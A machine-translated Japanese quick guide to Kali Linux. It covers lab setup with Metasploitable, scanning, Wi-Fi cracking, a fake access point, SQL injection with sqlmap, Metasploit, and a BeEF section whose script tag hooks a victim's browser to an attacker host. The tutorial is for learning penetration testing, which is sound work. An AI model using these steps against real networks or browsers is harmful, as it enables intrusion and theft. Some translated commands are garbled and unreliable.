Kali-linux-quick-guide

提供:Dev Guides
移動先:案内検索

Kali Linux-インストールと構成

Kali Linuxは、倫理的なハッカーにとって最高のセキュリティパッケージの1つであり、カテゴリごとに分けられたツールセットが含まれています。 これはオープンソースであり、公式Webページはhttps://www.kali.org/[[[1]]]です。

一般的に、Kali Linuxは、次のセクションで説明する仮想マシンとして、オペレーティングシステムとしてマシンにインストールできます。 Kali Linuxのインストールは、ツールを機能させたり組み合わせたりするためのより多くのオプションを提供するため、実用的なオプションです。 ライブブートCDまたはUSBを作成することもできます。 これらはすべて、次のリンクで確認できます。https://www.kali.org/downloads/

*BackTrack* はKali Linuxディストリビューションの古いバージョンでした。 最新リリースはKali 2016.1で、非常に頻繁に更新されます。

Linuxディストリビューション

Kali Linuxをインストールするには-

  • 最初に、仮想ボックスをダウンロードしてインストールします。
  • 後で、Kali Linuxディストリビューションをダウンロードしてインストールします。

Virtual Boxをダウンロードしてインストールする

Virtual Boxは、Kali Linuxで不明な点をテストする場合に特に役立ちます。 Virtual BoxでKali Linuxを実行すると、未知のパッケージを試したり、コードをテストしたりするときに安全です。

Virtual Boxの助けを借りて、MACまたはWindowsまたは別の種類のLinuxが可能なプライマリOSとともに、Kali Linuxをシステムに(ハードディスクに直接ではなく)インストールできます。

システムにVirtual Boxをダウンロードしてインストールする方法を理解しましょう。

仮想ボックスの最初のページ

  • ステップ2 *-[次へ]をクリックします。

セットアップ

  • ステップ3 *-次のページでは、アプリケーションをインストールする場所を選択するオプションが提供されます。 この場合、デフォルトのままにして、[次へ]をクリックします。

カスタムセットアップ

  • ステップ4 *-[次へ]をクリックすると、次の[カスタムセットアップ]スクリーンショットがポップアップ表示されます。 インストールする機能を選択して、「次へ」をクリックします。

カスタム機能

  • ステップ5 *-*はい*をクリックして、インストールを続行します。

ネットワークインターフェイス

  • ステップ6 *-[インストールの準備完了]画面が表示されます。 インストールをクリックします。

インストール準備完了

  • ステップ7 *-*完了*ボタンをクリックします。

完全インストール

次のスクリーンショットに示すように、Virtual Boxアプリケーションが開きます。 これで、このマニュアルの残りのホストをインストールする準備ができました。これは、専門的な使用にも推奨されます。

仮想マネージャー

Kali Linuxをインストールする

Virtual Boxを正常にインストールできたので、次のステップに進み、Kali Linuxをインストールします。

攻撃的セキュリティ

ステップ2 *-次のスクリーンショットに示すように、 VirtualBox→新規*をクリックします。

Machine New

  • ステップ3 *-正しい*仮想ハードディスクファイル*を選択し、*開く*をクリックします。

ハードディスクファイル

  • ステップ4 *-次のスクリーンショットが表示されます。 [作成]ボタンをクリックします。

作成

ステップ5 *-Kali OSを起動します。 デフォルトのユーザー名は *root で、パスワードは toor です。

Kali OS

カーリーを更新

機能を維持するには、Kali Linuxとそのツールを新しいバージョンに更新し続けることが重要です。 Kaliを更新する手順は次のとおりです。

  • ステップ1 *-アプリケーション→ターミナルに移動します。 次に、「apt-get update」と入力すると、次のスクリーンショットに示すように更新が行われます。

アプリケーション

ターミナル

  • ステップ2 *-ツールをアップグレードするには、「apt-get upgrade」と入力すると、新しいパッケージがダウンロードされます。

アップグレード

ステップ3 *-続行するかどうか尋ねられます。 *「Y」*および「Enter」*と入力します。

Enter Y

ステップ4 *-オペレーティングシステムの新しいバージョンにアップグレードするには、“ apt-get distupgrade” *と入力します。

Dist Upgrade

実験室のセットアップ

このセクションでは、Kali Linuxのツールを使用してテストを実行する別のテストマシンをセットアップします。

ステップ1 *-Linuxマシンである *Metasploitable をダウンロードします。 Rapid7 の公式ウェブページからダウンロードできます:https://information.rapid7.com/metasploitable-downloadl?LS=1631875&CS=web[https://information.rapid7.com/metasploitabledownloadl?LS=1631875&CS=web ]

メタスプロイタブル

  • ステップ2 *-詳細を入力して登録します。 上記のフォームに記入した後、ソフトウェアをダウンロードできます。

登録

ステップ3 *- VirtualBox→新規*をクリックします。

Machine New

ステップ4 *-「既存の仮想ハードディスクファイルを使用する」をクリックします。 *Metasploitable をダウンロードしたファイルを参照し、 Open をクリックします。

既存のハードディスク

  • ステップ5 *-仮想マシンを作成する画面が表示されます。 「作成」をクリックします。

Machine Popups

デフォルトのユーザー名は msfadmin で、パスワードは msfadmin です。

ログイン詳細

Kali Linux-情報収集ツール

この章では、Kali Linuxの情報収集ツールについて説明します。

NMAPおよびZenMAP

NMAPとZenMAPは、Kali Linuxでの倫理的ハッキングのスキャンフェーズに役立つツールです。 NMAPとZenMAPは実質的に同じツールですが、ZMAPにはGUIがありますが、NMAPはコマンドラインを使用します。

NMAPは、ネットワーク検出とセキュリティ監査のための無料のユーティリティツールです。 多くのシステムおよびネットワーク管理者は、ネットワークインベントリ、サービスアップグレードスケジュールの管理、ホストまたはサービスのアップタイムの監視などのタスクにも役立ちます。

NMAPは、ネットワーク上で利用可能なホスト、ホストが提供するサービス(アプリケーション名とバージョン)、実行しているオペレーティングシステム(およびOSバージョン)、パケットフィルター/ファイアウォールの種類を決定するために、生のIPパケットを斬新な方法で使用します使用中など

それでは、一歩ずつ進み、NMAPとZenMAPの使用方法を学びましょう。

  • ステップ1 *-開くには、アプリケーション→01-情報収集→nmapまたはzenmapに移動します。

Nmap ZenMap

  • ステップ2 *-次のステップは、ターゲットホストのOSタイプ/バージョンを検出することです。 NMAPが示すヘルプに基づいて、OSタイプ/バージョン検出のパラメーターは変数「-O」です。 詳細については、次のリンクを使用してください。https://nmap.org/book/man-os-detectionl

使用するコマンドは次のとおりです-

nmap -O 192.168.1.101

次のスクリーンショットは、Nmap出力を表示するために上記のコマンドを入力する必要がある場所を示しています-

Nmap出力

  • ステップ3 *-次に、TCPおよびUDPポートを開きます。 NMAPに基づいてすべてのTCPポートをスキャンするには、次のコマンドを使用します-
nmap -p 1-65535 -T4  192.168.1.101

パラメータ「-p」は、スキャンする必要があるすべてのTCPポートを示します。 この場合、すべてのポートをスキャンしています。「-T4」は、NMAPを実行する必要があるスキャンの速度です。

結果は次のとおりです。 緑はすべてのTCPオープンポートで、赤はすべてのクローズポートです。 ただし、リストが長すぎるため、NMAPは表示されません。

閉じたポート

ステルススキャン

ステルススキャンまたはSYNは、TCPスリーウェイハンドシェイクを完了しないため、 half-open scan とも呼ばれます。 ハッカーはSYNパケットをターゲットに送信します。 SYN/ACKフレームが受信された場合、ターゲットが接続を完了し、ポートがリッスンしていると想定されます。 ターゲットからRSTを受信した場合、ポートがアクティブでないか、閉じていると見なされます。

ハーフオープンスキャン

Syn Packet

実際にSYNスキャンを確認するには、NMAPでパラメーター –sS を使用します。 以下は完全なコマンドです-

nmap -sS -T4 192.168.1.101

次のスクリーンショットは、このコマンドの使用方法を示しています-

ZenMapコマンド

Searchsploit

Searchsploitは、Kali LinuxユーザーがExploitデータベースアーカイブからコマンドラインで直接検索できるようにするツールです。

それを開くには、次のスクリーンショットに示すように、アプリケーション→08-エクスプロイトツール→searchsploitに移動します。

Searchsploit

ターミナルを開いた後、「 searchsploit exploit index name 」と入力します。

エクスプロイトインデックス名

DNSツール

このセクションでは、Kaliが組み込んだDNSツールの使用方法を学習します。 基本的に、これらのツールはゾーン転送またはドメインIP解決の問題に役立ちます。

dnsenum.pl

最初のツールは dnsenum.pl で、これはMX、A、およびその他のレコードをドメインに接続するのに役立つPERLスクリプトです。

左側のパネルでターミナルをクリックします。

ターミナル左パネル

  • 「dnsenum domain name」*と入力すると、すべてのレコードが表示されます。 この場合、Aレコードが表示されます。

ドメイン名

DNSMAP

2番目のツールは DNSMAP で、このドメインに接続されている電話番号、連絡先、およびその他のサブドメインを検索するのに役立ちます。 以下はその一例です。

上のセクションのように端末をクリックし、*「dnsmap domain name」*と入力します

DNSマップ

dnstracer

3番目のツールは dnstracer です。これは、特定のドメインネームサーバー(DNS)が特定のホスト名の情報を取得する場所を決定します。

上のセクションのようにターミナルをクリックし、「「dnstracerドメイン名」」と入力します。

DnsTracer

LBDツール

LBD(Load Balancing Detector)ツールは、特定のドメインがDNSおよび/またはHTTPの負荷分散を使用しているかどうかを検出するため、非常に興味深いツールです。 サーバーが2つある場合、どちらか一方が更新されず、それを悪用しようとする可能性があるため、重要です。 それを使用する手順は次のとおりです-

最初に、左側のパネルでターミナルをクリックします。

ターミナル左パネル

次に、「 "lbd domainname" 」と入力します。 結果が「FOUND」として生成される場合、サーバーに負荷バランスがあることを意味します。 この場合、結果は「NOT FOUND」です。

LBDドメイン名

Hping3

Hping3は、倫理的なハッカーによって広く使用されています。 pingツールとほぼ同じですが、ファイアウォールフィルターをバイパスし、TCP、UDP、ICMP、およびRAW-IPプロトコルを使用できるため、より高度です。 tracerouteモードと、対象のチャネル間でファイルを送信する機能があります。

左側のパネルでターミナルをクリックします。

ターミナル左パネル

  • “ hping3 –h” *と入力すると、このコマンドの使用方法が表示されます。

Hping3

他のコマンドは*「hping3ドメインまたはIPパラメーター」*

IPパラメーター

Kali Linux-脆弱性分析ツール

この章では、デバイスやアプリケーションを利用してアクセスするのに役立つツールの使用方法を学習します。

シスコツール

Kaliには、Ciscoルーターを活用するために使用できるツールがいくつかあります。 そのようなツールの1つは、マススキャン、フィンガープリント、および悪用に使用される Cisco-torch です。

左ペインをクリックして、ターミナルコンソールを開きましょう。

ターミナル左パネル

次に、「* cisco-torch –parameter IP of host」*と入力します。悪用するものが見つからない場合は、次の結果が表示されます。

Cisco Torch

使用できるパラメータを確認するには、*“ cisco-torch?” *と入力します

Ciscoパラメータ

シスコ監査ツール

これは、一般的な脆弱性についてCiscoルーターをスキャンするPERLスクリプトです。 それを使用するには、前のセクションで示したように左ペインでターミナルを再度開き、*“ CAT –hホスト名またはIP” *と入力します。

次のスクリーンショットに示すように、ポートパラメータ*“-p” *を追加できます。この場合、23がブルートフォースになります。

ポートパラメータ

Cisco Global Exploiter

Cisco Global Exploiter(CGE)は、高度でシンプルかつ高速なセキュリティテストツールです。 これらのツールを使用すると、次のスクリーンショットに示すように、いくつかのタイプの攻撃を実行できます。 ただし、実際の環境でテストする場合は、一部がシスコのデバイスをクラッシュさせる可能性があるため注意してください。 たとえば、オプションOptionはサービスを停止できます。

Ciscoデバイス

このツールを使用するには、「cge.pl IPaddress 脆弱性の数」と入力します

次のスクリーンショットは、上記リストの脆弱性番号3に対してCiscoルーターで実行されたテストの結果を示しています。 結果は、脆弱性が悪用されたことを示しています。

Ciscoルーター

BED

BEDは、デーモンの潜在的なバッファオーバーフロー、フォーマット文字列などをチェックするように設計されたプログラムです。 al.

デーモンの確認

この場合、IP 192.168.1.102 およびプロトコルHTTPでテストマシンをテストします。

コマンドは*“ bed –s HTTP –t 192.168.1.102” *になり、テストが続行されます。

テスト

Kali Linux-ワイヤレス攻撃

この章では、Kali Linuxに組み込まれているWi-Fiクラッキングツールの使用方法を学習します。 ただし、使用しているワイヤレスカードが監視モードをサポートしていることが重要です。

シダWifiクラッカー

Fern Wifiクラッカーは、Kaliがワイヤレスを解読するためのツールの1つです。

Fernを開く前に、ワイヤレスカードを監視モードに切り替える必要があります。 これを行うには、ターミナルで*「airmon-ng start wlan-0」*と入力します。

Airmon Ng

次に、Fern Wireless Crackerを開きます。

  • ステップ1 *-アプリケーション→[ワイヤレス攻撃]→[シダワイヤレスクラッカー]をクリックします。

Fern Wireless Cracker

  • ステップ2 *-次のスクリーンショットに示すように、ワイヤレスカードを選択します。

ワイヤレスカード

  • ステップ3 *-[アクセスポイントのスキャン]をクリックします。

アクセスポイント

  • ステップ4 *-スキャンが完了すると、見つかったすべてのワイヤレスネットワークが表示されます。 この場合、「WPAネットワーク」のみが見つかりました。

WPAネットワーク

  • ステップ5 *-上記のスクリーンショットに示すように、WPAネットワークをクリックします。 見つかったすべてのワイヤレスが表示されます。 一般的に、WPAネットワークでは、辞書攻撃を実行します。
  • ステップ6 *-[参照]をクリックして、攻撃に使用するワードリストを見つけます。

ワードリスト

  • ステップ7 *-「Wifi攻撃」をクリックします。

Wifi攻撃

  • ステップ8 *-辞書攻撃を完了した後、パスワードを検出し、次のスクリーンショットの図に示すように表示されます。

辞書攻撃

キスメット

Kismetは、WIFIネットワーク分析ツールです。 これは、802.11レイヤー2ワイヤレスネットワーク検出器、スニファー、および侵入検出システムです。 rawモニタリング(rfmon)モードをサポートし、802.11a/b/g/nトラフィックをスニッフィングできるワイヤレスカードで動作します。 パケットと隠しネットワークを収集することにより、ネットワークを識別します。

それを使用するには、ワイヤレスカードを監視モードに切り替え、これを行うには、ターミナルで*「airmon-ng start wlan-0」*と入力します。

Start Wlan

このツールの使用方法を学びましょう。

  • ステップ1 *-起動するには、ターミナルを開いて「kismet」と入力します。

起動

  • ステップ2 *-[OK]をクリックします。

Kismet

  • ステップ3 *-Kismetサーバーの起動を要求するメッセージが表示されたら、[はい]をクリックします。 そうでない場合、機能を停止します。

サーバーの起動

  • ステップ4 *-起動オプション、デフォルトのままにします。 「開始」をクリックします。

デフォルトのままにする

  • ステップ5 *-ワイヤレスカードの定義を求めるテーブルが表示されます。 そのような場合は、「はい」をクリックします。

テーブルの定義

ステップ6 *-この場合、無線ソースは“ wlan0” *です。 *「Intf」*セクションに記述する必要があります→「追加」をクリックします。

Wirless Source

  • ステップ7 *-次のスクリーンショットに示すように、WiFiネットワークのスニッフィングを開始します。

ネットワーク

  • ステップ8 *-任意のネットワークをクリックすると、次のスクリーンショットに示すようにワイヤレスの詳細が生成されます。

ワイヤレスネットワーク

GISKismet

GISKismetは、Kismetを使用して収集したデータを実用的な方法で表すためのワイヤレス視覚化ツールです。 GISKismetは情報をデータベースに保存するため、SQLを使用してデータを照会し、グラフを生成できます。 GISKismetは現在、データベースにSQLiteを、グラフにGoogleEarth/KMLファイルを使用しています。

このツールの使用方法を学びましょう。

  • ステップ1 *-GISKismetを開くには、[アプリケーション]→[ワイヤレス攻撃]をクリックして、giskismetに移動します。

Giskismet

前のセクションで覚えているように、Kismetツールを使用して、ワイヤレスネットワークに関するデータと、このすべてのデータKismetパックをnetXMLファイルに探索しました。

  • ステップ2 *-このファイルをGiskismetにインポートするには、「root@ kali:〜#giskismet -x Kismetfilename.netxml」と入力すると、ファイルのインポートが開始されます。

ファイルのインポート

インポートしたら、前に見つけたホットスポットをGoogle Earthにインポートできます。

  • ステップ3 *-Google Earthが既にインストールされていると仮定して、[ファイル]→[Giskismetが作成したファイルを開く]→[開く]をクリックします。

Google Earth

次のマップが表示されます。

マップ

ゴーストフィッシャー

Ghost Phisherは、偽の無線アクセスポイントを作成し、後でMan-in-The-Middle-Attackを作成するのに役立つ人気のあるツールです。

  • ステップ1 *-アプリケーションを開くには、[アプリケーション]→[ワイヤレス攻撃]→[ゴーストフィッシング]をクリックします。

ゴーストフィッシャー

  • ステップ2 *-開いた後、次の詳細を使用して偽のAPをセットアップします。
  • ワイヤレスインターフェイス入力:wlan0
  • SSID:ワイヤレスAP名
  • IPアドレス:APが持つIP
  • WAP:接続するためのこのSSIDを持つパスワード

Ghost Phisherを開く

  • ステップ3 *-*スタート*ボタンをクリックします。

Wifite

これは、複数のWEP、WPA、およびWPS暗号化ネットワークを連続して攻撃する別のワイヤレスクラッキングツールです。

まず、ワイヤレスカードは監視モードにする必要があります。

  • ステップ1 *-それを開くには、アプリケーション→ワイヤレス攻撃→Wifiteに進みます。

Wifite

ステップ2 *- "wifite –showb" *と入力して、ネットワークをスキャンします。

Wifite Showb

スキャンネットワーク

  • ステップ3 *-ワイヤレスネットワークへの攻撃を開始するには、Ctrl + Cをクリックします。

攻撃

  • ステップ4 *-「1」を入力して、最初のワイヤレスをクラックします。

最初のクラック

  • ステップ5 *-攻撃が完了すると、キーが見つかります。

キーが見つかりました

Kali Linux-ウェブサイト侵入テスト

この章では、Kali Linuxが提供するWebサイト侵入テストについて学習します。

Vegaの使用法

Vegaは、Webアプリケーションのセキュリティをテストするための無料のオープンソーススキャナーおよびテストプラットフォームです。 Vegaは、SQLインジェクション、クロスサイトスクリプティング(XSS)、不注意で公開された機密情報、およびその他の脆弱性を見つけて検証するのに役立ちます。 JavaベースのGUIで記述され、Linux、OS X、およびWindowsで実行されます。

Vegaには、迅速なテスト用の自動スキャナーと、戦術検査用のインターセプトプロキシが含まれています。 Vegaは、Web言語であるJavaScriptの強力なAPIを使用して拡張できます。 公式ウェブページはhttps://subgraph.com/vega/です

サブグラフ

  • ステップ1 *-Vegaを開くには、アプリケーション→03-Web Application Analysis→Vegaに移動します

Vega

  • ステップ2 *-パスにアプリケーションが表示されない場合は、次のコマンドを入力します。

サブグラフ

  • ステップ3 *-スキャンを開始するには、「+」記号をクリックします。

サブグラフベガ

  • ステップ4 *-スキャンするWebページのURLを入力します。 この場合、それはメタスプロイタブルマシンです→「次へ」をクリックします。

ページURLを入力

  • ステップ5 *-制御するモジュールのすべてのボックスをオンにします。 次に、「次へ」をクリックします。

モジュールボックス

  • ステップ6 *-次のスクリーンショットで「次へ」をもう一度クリックします。

次へ再び

  • ステップ7 *-「完了」をクリックします。

完了ボタン

  • ステップ8 *-次の表が表示されたら、[はい]をクリックします。

リダイレクトに従う

次のスクリーンショットに示すように、スキャンが続行されます。

スキャナーの進捗状況

  • ステップ9 *-スキャンが完了した後、左下のパネルにすべての結果が表示され、重大度に従って分類されます。 クリックすると、右側のパネルに「リクエスト」、「ディスカッション」、「インパクト」、「修復」などの脆弱性の詳細がすべて表示されます。

左下パネル

ZapProxy

ZAP-OWASP Zed Attack Proxyは、Webアプリケーションの脆弱性を見つけるための使いやすい統合侵入テストツールです。 これはJavaインターフェースです。

  • ステップ1 *-ZapProxyを開くには、アプリケーション→03-Web Application Analysis→owaspzapに移動します。

ZapProxy

  • ステップ2 *-[同意する]をクリックします。

ライセンス版

ZAPのロードが開始されます。

OWASP Zap

  • ステップ3 *-次のスクリーンショットに示すように、オプションのいずれかを選択し、「開始」をクリックします。

オプションを選択

次のWebはIPでメタスプロイタブルです:192.168.1.101

Web Metasploitable

  • ステップ4 *-「攻撃するURL」でテストWebのURLを入力し、「攻撃」をクリックします。

URL攻撃

スキャンが完了すると、左上のパネルにすべてのクロールされたサイトが表示されます。

左パネルの「アラート」に、すべての結果と説明が表示されます。

アラート

  • ステップ5 *-「スパイダー」をクリックすると、すべてのリンクがスキャンされます。

スパイダー

データベースツールの使用

sqlmap

sqlmapは、SQLインジェクションの欠陥を検出して活用し、データベースサーバーを乗っ取るプロセスを自動化するオープンソースの侵入テストツールです。 強力な検出エンジン、究極のペネトレーションテスターの多くのニッチ機能、データベースフィンガープリンティング、データベースからのデータフェッチ、基盤となるファイルシステムへのアクセス、およびオペレーティングシステム上でのコマンド実行までの幅広いスイッチが付属しています。帯域接続。

sqlmapの使用方法を学びましょう。

  • ステップ1 *-sqlmapを開くには、アプリケーション→04-データベース評価→sqlmapに移動します。

SQLMap

SQLインジェクションに対して脆弱なパラメータを持つWebページはメタスプロイタブルです。

SQLインジェクション

ステップ2 *-SQLインジェクションテストを開始するには、「sqlmap – u URL ofvictim」*と入力します。

Url Victim

  • ステップ3 *-結果から、いくつかの変数が脆弱であることがわかります。

変数の結果

sqlninja

sqlninjaは、完全なGUIアクセスに対するMicrosoft SQL Server上のSQLインジェクションです。 sqlninjaは、Microsoft SQL Serverをバックエンドとして使用するWebアプリケーションでSQLインジェクションの脆弱性を悪用することを目的としたツールです。 このツールに関する完全な情報は、http://sqlninja.sourceforge.net/にあります。

  • ステップ1 *-sqlninjaを開くには、アプリケーション→04-データベース評価→sqlninjaに移動します。

データベース評価

CMSスキャンツール

WPScan

WPScanは、セキュリティの問題を見つけるためにリモートWordPressインストールをスキャンするために使用できるブラックボックスWordPress脆弱性スキャナーです。

  • ステップ1 *-WPscanを開くには、アプリケーション→03-Web Application Analysis→「wpscan」に移動します。

Webアプリケーション

次のスクリーンショットが表示されます。

Wpscan

ステップ2 *-Webサイトの脆弱性をスキャンするには、“ wpscan –u URL of webpage” *と入力します。

スキャナーが更新されていない場合、更新するように求められます。 私はそれを行うことをお勧めします。

スキャナー更新

スキャンが開始されると、結果が表示されます。 次のスクリーンショットでは、脆弱性は赤い矢印で示されています。

赤い矢印

スキャン開始

Joomscan

Joomlaは、その柔軟性により、おそらく最も広く使用されているCMSです。 このCMSでは、Joomlaスキャナーです。 これは、Web開発者とWebマスターが、展開されたJoomlaサイトで考えられるセキュリティ上の弱点を特定するのに役立ちます。

ステップ1 *-開くには、ターミナルの左パネルをクリックし、「joomscan – parameter」*をクリックします。

ステップ2 *-使用タイプのヘルプを取得するには“ joomscan/?” *

Joomscan

  • ステップ3 *-スキャンを開始するには、「被害者のjoomscan -u URL」と入力します。

OWASP

次のスクリーンショットに示すように、結果が表示されます。

脆弱性

提案

SSLスキャンツール

*TLSSLed* は、ターゲットSSL/TLS(HTTPS)Webサーバー実装のセキュリティを評価するために使用されるLinuxシェルスクリプトです。 これは、sslssl、opensslライブラリに基づく完全なSSL/TLSスキャナー、および*“ openssl s_client” *コマンドラインツールに基づいています。

現在のテストには、ターゲットがSSLv2プロトコル、NULL暗号、キー長(40または56ビット)に基づく弱い暗号、強力な暗号(AESなど)の可用性、デジタル証明書がMD5署名の場合、および現在のSSL/TLS再ネゴシエーション機能。

テストを開始するには、ターミナルを開いて*「tlssled URL port」*と入力します。 データを見つけるために証明書のテストを開始します。

Tissled

次のスクリーンショットに緑で示されているように、証明書は2018年まで有効であるという調査結果からわかります。

証明書

w3af

w3afは、すべてのWebアプリケーションの脆弱性を特定して悪用することを目的としたWebアプリケーション攻撃および監査フレームワークです。 このパッケージは、フレームワークのグラフィカルユーザーインターフェイス(GUI)を提供します。 コマンドラインアプリケーションのみが必要な場合は、w3af-consoleをインストールします。

このフレームワークは「ウェブ向けのメタスプロイト」と呼ばれていますが、ブラックボックススキャン技術を使用してウェブアプリケーションの脆弱性を発見するため、実際にははるかに多くの機能を備えています。 w3afコアとそのプラグインは完全にPythonで書かれています。 このプロジェクトには130を超えるプラグインがあり、SQLインジェクション、クロスサイトスクリプティング(XSS)、リモートファイルインクルードなどを識別して活用します。

  • ステップ1 *-開くには、アプリケーション→03-Web Application Analysis→w3afをクリックします。

アプリケーションW3af

  • ステップ2 *-「ターゲット」で、被害者のURLを入力します。この場合、メタスプロイタブルWebアドレスになります。

ターゲット

  • ステップ3 *-プロファイルを選択→[開始]をクリックします。

プロファイル開始

  • ステップ4 *-「結果」に移動すると、詳細とともに結果が表示されます。

検索結果

Kali Linux-悪用ツール

この章では、Kali Linuxが提供するさまざまな活用ツールについて学びます。

メタスプロイト

前述したように、MetasploitはRapid7の製品であり、ほとんどのリソースはWebページhttps://www.metasploit.com./[www.metasploit.com]にあります。 商用版と無料版の2つのバージョンがあります。 したがって、これら2つのバージョンの違いはそれほど大きくありません。この場合、コミュニティバージョン(無料)を使用します。

倫理的ハッカーとして、Metasploitコミュニティバージョンが埋め込まれた「Kali Ditribution」と、インストール時間を節約することで非常に快適な他の倫理的ハッキングツールを使用します。 ただし、別のツールとしてインストールする場合は、Linux、Windows、OS Xなどのオペレーティングシステムにインストールできるアプリケーションです。

最初に、KaliでMetasploit Consoleを開きます。 次に、アプリケーション→エクスプロイトツール→Metasploitに移動します。

エクスプロイトツール

起動すると、次の画面が表示され、Metasploitのバージョンに赤の下線が引かれます。

Metasploitバージョン

コンソールで、ヘルプまたは?を使用する場合 記号を使用すると、MSPのコマンドとその説明のリストが表示されます。 ニーズと使用するものに基づいて選択できます。

コンソールシンボル

別の重要な管理コマンドは msfupdate で、これは最新の脆弱性エクスプロイトでメタスプロイトを更新するのに役立ちます。 コンソールでこのコマンドを実行した後、更新が完了するまで数分待つ必要があります。

MSFUpdate

次のスクリーンショットに示すように、「検索」と呼ばれる優れたコマンドを使用して、必要なものを見つけることができます。 たとえば、Microsoftに関連するエクスプロイトを検索する場合、コマンドは msf> search name:Microsoft type:exploit になります。

ここで、「search」はコマンド、「name」は探しているオブジェクトの名前、「type」は探しているスクリプトの種類です。

検索コマンド

別のコマンドは「info」です。 使用されるモジュールまたはプラットフォーム、作成者、脆弱性リファレンス、およびこれが持つことができるペイロード制限に関する情報を提供します。

情報コマンド

アーミテージ

metasploitのArmitage GUIは、metasploitの補完ツールです。 ターゲットを視覚化し、エクスプロイトを推奨し、高度な悪用後の機能を公開します。

開いてみましょうが、最初にmetasploitコンソールを開いて起動する必要があります。 アーミテージを開くには、アプリケーション→エクスプロイトツール→アーミテージに移動します。

アーミテージ

次のスクリーンショットに示すように、[接続]ボタンをクリックします。

接続

開くと、次の画面が表示されます。

ユーザーフレンドリー

アーミテージはユーザーフレンドリーです。 「ターゲット」エリアには、発見したすべてのマシンと作業中のマシンが一覧表示されます。ハッキングされたターゲットは赤色で雷雨が発生しています。

ターゲットをハッキングした後、ターゲットを右クリックして、フォルダーの探索(参照)など、必要な操作を続けて探索できます。

探索中

次のGUIには、コンソールと呼ばれるフォルダーのビューが表示されます。 フォルダをクリックするだけで、metasploitコマンドを必要とせずにフォルダ間を移動できます。

GUIの右側には、脆弱性のモジュールがリストされているセクションがあります。

コンソールフォルダー

BeEF

BeEFは Browser Exploitation Framework の略です。 これは、Webブラウザーに焦点を当てた侵入テストツールです。 BeEFを使用すると、プロの侵入テスターは、クライアント側の攻撃ベクトルを使用して、ターゲット環境の実際のセキュリティ状態を評価できます。

まず、次のコマンドを使用してKaliパッケージを更新する必要があります-

root@kali:/# apt-get update
root@kali:/# apt-get install beef-xss

開始するには、次のコマンドを使用します-

root@kali:/# cd/usr/share/beef-xss
root@kali:/# ./beef

カーリーパッケージ

ブラウザを開き、ユーザー名とパスワードを入力します: beef

ブラウザを開く

BeEFフックは、クライアントブラウザで実行する必要があるBeEFサーバーでホストされるJavaScriptファイルです。 実行すると、ターゲットに関する多くの情報を通信するBeEFサーバーにコールバックします。 また、追加のコマンドとモジュールをターゲットに対して実行することもできます。 この例では、 BeEF フックの場所は http://192.168.1.101:3000/hook.js です。

ブラウザーを攻撃するには、クライアントが表示するページにJavaScriptフックを含めます。 それにはいくつかの方法がありますが、最も簡単な方法は、ページに次を挿入し、何らかの方法でクライアントにそれを開かせることです。

<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script>

ページが読み込まれたら、BeEFコントロールパネルに戻り、左上の[オンラインブラウザ]をクリックします。 数秒後、フックされたブラウザを表すIPアドレスポップアップが表示されます。 IPにカーソルを合わせると、ブラウザのバージョン、オペレーティングシステム、インストールされているプラ​​グインなどの情報がすぐに提供されます。

ページ読み込み

コマンドをリモートで実行するには、「所有」ホストをクリックします。 次に、コマンドで実行するモジュールをクリックし、最後に「実行」をクリックします。

リモートで実行

Linux Exploit Suggester

Linuxオペレーティングシステムのリリースバージョン 'uname -r' が与えられると、悪用の可能性が示唆されます。

それを実行するには、次のコマンドを入力します-

root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0
*3.0.0* は、利用したいLinux OSのカーネルバージョンです。

カーネルバージョン

Kali Linux-フォレンジックツール

この章では、Kali Linuxで利用可能なフォレンジックツールについて学習します。

p0f

*p0f* は、問題のデバイスがパケットファイアウォールの背後にある場合でも、キャプチャしたパケットを調べるだけで、ターゲットホストのオペレーティングシステムを識別することができるツールです。 P0fは、直接または間接の追加のネットワークトラフィックを生成しません。名前検索なし;神秘的なプローブはありません。 ARINクエリなし。何もない。 上級ユーザーの手で、P0fはファイアウォールの存在、NATの使用、およびロードバランサーの存在を検出できます。

ターミナルで*“ p0f – h” *と入力して使用方法を確認すると、次の結果が得られます。

ターゲットホスト

上級ユーザー

使用可能なインターフェースもリストされます。

利用可能なインターフェース

次に、次のコマンドを入力します:*“ p0f –i eth0 –p -o filename” *。

パラメータ "-i" は、上記のインターフェイス名です。 "-p" は、混合モードであることを意味します。 "-o" は、出力がファイルに保存されることを意味します。

コマンドの種類

アドレス192.168.1.2のWebページを開きます

ウェブページのアドレス

結果から、Webサーバーがapache 2.xを使用しており、OSがDebianであることがわかります。

pdf-parser

pdf-parserは、PDFドキュメントを解析して、分析されたpdfファイルで使用される基本的な要素を識別するツールです。 PDFドキュメントはレンダリングされません。 PDFパーサーのテキストブックケースにはお勧めしませんが、作業は完了します。 通常、これは、スクリプトが埋め込まれている疑いがあるpdfファイルに使用されます。

コマンドは-

pdf-parser  -o 10 filepath

「-o」はオブジェクトの数です。

番号オブジェクト

次のスクリーンショットでわかるように、pdfファイルはCMDコマンドを開きます。

CMDコマンド

ダンプジラ

DumpzillaアプリケーションはPython 3.xで開発され、Firefox、Iceweasel、およびSeamonkeyブラウザーのすべての法医学的に興味深い情報を抽出して抽出することを目的としています。

救助

1つのファイルまたはブロックデバイス(ハードディスク、cdromなど)から別のデバイスにデータをコピーし、読み取りエラーが発生した場合に最初に適切な部分をレスキューしようとします。

ddrescueの基本操作は完全に自動化されています。 つまり、エラーを待ったり、プログラムを停止したり、新しい位置から再起動したりする必要はありません。

ddrescueのmapfile機能を使用すると、データは非常に効率的にレスキューされます(必要なブロックのみが読み取られます)。 また、いつでもレスキューを中断して、同じ時点で後で再開できます。 マップファイルは、ddrescueの有効性の重要な部分です。 自分がしていることがわからない場合は使用してください。

コマンドラインは-

dd_rescue infilepath  outfilepath

パラメーター "– v" は詳細を意味します。 "/dev/sdb" はレスキューされるフォルダーです。 * imgファイル*は復元されたイメージです。

回復した画像

DFF

ファイルを回復するために使用されるもう1つのフォレンジックツールです。 GUIもあります。 それを開くには、ターミナルで*「dff-gui」*と入力すると、次のWeb GUIが開きます。

DFF GUI

[ファイル]→[証拠を開く]をクリックします。

証拠を開く

次の表が開きます。 「Raw format」にチェックマークを付け、「+」をクリックして、復元するフォルダーを選択します。

未加工形式

次に、ペインの左側のファイルを参照して、回復された内容を確認できます。

ファイルの参照

Kali Linux-ソーシャルエンジニアリング

この章では、Kali Linuxで使用されるソーシャルエンジニアリングツールについて学習します。

ソーシャルエンジニアリングツールキットの使用

